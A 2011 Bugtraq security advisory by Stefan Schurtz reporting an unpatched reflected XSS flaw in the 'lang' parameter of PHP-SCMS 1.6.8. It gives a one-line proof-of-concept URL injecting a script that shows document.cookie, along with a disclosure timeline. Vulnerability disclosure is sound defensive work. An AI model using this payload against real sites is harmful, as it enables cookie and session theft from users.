PHP-SCMS 1.6.8 "lang" parameter XSS vulnerability

From: sschurtz@t-online.de
To: bugtraq@securityfocus.com
Cc:
Subject: PHP-SCMS 1.6.8 "lang" parameter XSS vulnerability
Date:


Advisory:               PHP-SCMS 1.6.8 "lang" parameter XSS vulnerability
Advisory ID:            SSCHADV2011-035
Author:                     Stefan Schurtz
Affected Software:   Successfully tested on PHP-SCMS 1.6.8
Vendor URL:           http://php-scms.sourceforge.net/
Vendor Status:             unpatched (no vendor feedback)

==========================
Vulnerability Description
==========================

PHP-SCMS "lang" parameter is prone to a XSS vulnerability

==================
PoC-Exploit
==================

http://<target>/scms/index.php?lang='"</script><script>alert(document.cookie)</script>

=========
Solution
=========

unpatched

====================
Disclosure Timeline
====================

08-Nov-2011 - Secunia SVCRP (vuln@secunia.com)
14-Dec-2011 - no vendor feedback
14-Dec-2011 - release date of this security advisory

========
Credits
========

Vulnerability found and advisory written by Stefan Schurtz.

===========
References
===========

http://secunia.com/advisories/46766/
http://www.rul3z.de/advisories/SSCHADV2011-035.txt





Copyright © 1995-2021 LinuxRocket.net. All rights reserved.